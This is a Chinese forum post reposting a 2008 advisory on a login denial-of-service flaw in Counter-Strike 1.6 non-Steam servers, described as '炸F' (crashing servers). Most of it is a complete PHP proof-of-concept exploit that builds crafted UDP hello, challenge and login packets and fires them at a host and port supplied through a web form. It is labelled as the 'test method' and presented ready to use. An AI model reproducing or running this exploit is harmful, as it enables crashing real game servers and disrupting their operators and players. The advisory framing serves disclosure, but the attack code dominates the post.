|
发表于 2009-2-3 20:19:44
|
显示全部楼层
来自 中国–广东–深圳–宝安区
Half-Life Counter-Strike登录拒绝服务漏洞
也就是我们通常说的炸F
漏洞消息时间:2008-01-07
漏洞起因
异常条件处理失败错误
影响系统
Valve Software Half-Life Counter-Strike 1.6
不受影响系统
危害
远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
攻击所需条件
攻击者必须访问Half-Life Counter-Strike。
漏洞信息
Half-Life Counter-Strike是一款流行的即时射击游戏。
Half-Life Counter-Strike不正确处理登录请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
提交恶意登录请求可触发此漏洞。
测试方法
----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]
Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ / .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ // \ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // // \ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
- /*
- CS-dos exploit made by underwater
- Bug was discovered by .FUF
- Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
- */
- ini_set("display_errors","0");
- function HELLO_PACKET()
- {
- $packet = pack("H*","FFFFFFFF");
- $packet .= "TSource Engine Query";
- $packet .= pack("H*","00");
- return $packet;
- }
- function CHALLENGE_PACKET()
- {
- $packet = pack("H*","FFFFFFFF");
- $packet .= "getchallenge valve";
- $packet .= pack("H*","00");
- return $packet;
- }
- function LOGIN_PACKET_4()
- {
- global $cookie;
- global $password;
- $packet = pack("H*","FFFFFFFF");
- $packet .= "connect 47 ";
- $packet .= $cookie.' "';
- $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
- $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
- $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
- $packet .= 'word\\'.$password;
- $packet .= pack("H*","220A0000EE02");
- return $packet;
- }
- function LOGIN_PACKET_2()
- {
- global $cookie;
- global $password;
- $packet = pack("H*","FFFFFFFF");
- $packet .= "connect 47 ";
- $packet .= $cookie.' "';
- $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
- $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
- $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
- $packet .= 'word\\'.$password;
- $packet .= pack("H*","22");
- return $packet;
- }
- function dowork($host,$port,$password,$auth)
- {
- global $password;
- global $cookie;
- # connecting to target host
- $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
- if (!$fsock) die ($errstr);
- else
- {
- # sending hello packet
- fwrite ($fsock,HELLO_PACKET());
- fread ($fsock,100);
- # sending chalennge packet
- fwrite ($fsock,CHALLENGE_PACKET());
- # recieving cookies
- $resp = fread($fsock,100);
- # grab cookies from packet
- $cookie = substr($resp,strpos($resp,"A00000000")+10);
- $cookie = substr($cookie,0,strpos($cookie," "));
- # sending login packet
- if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
- $resp = fread($fsock,100);
- }
- }
- IF (isset($_POST['host']) && isset($_POST['port']))
- {
- IF (empty($_POST['pass'])) $password = "123";
- else $password = $_POST['pass'];
- $fserver = $_POST['host'];
- $fport = $_POST['port'];
- if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
- # we have to connect 2 times
- $result = dowork($fserver,$fport,$password,$fauth);
- $result = dowork($fserver,$fport,$password,$fauth);
- # parsing result
- echo "Exploit Sent";
- }
复制代码 ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
厂商解决方案
目前没有解决方案提供:
http://www.valvesoftware.com/games.html
漏洞提供者
Maxim Suhanov
漏洞消息链接
http://www.securityfocus.com/bid/27159
漏洞消息标题
Half-Life Counter-Strike Login Denial of Service Vulnerability |
|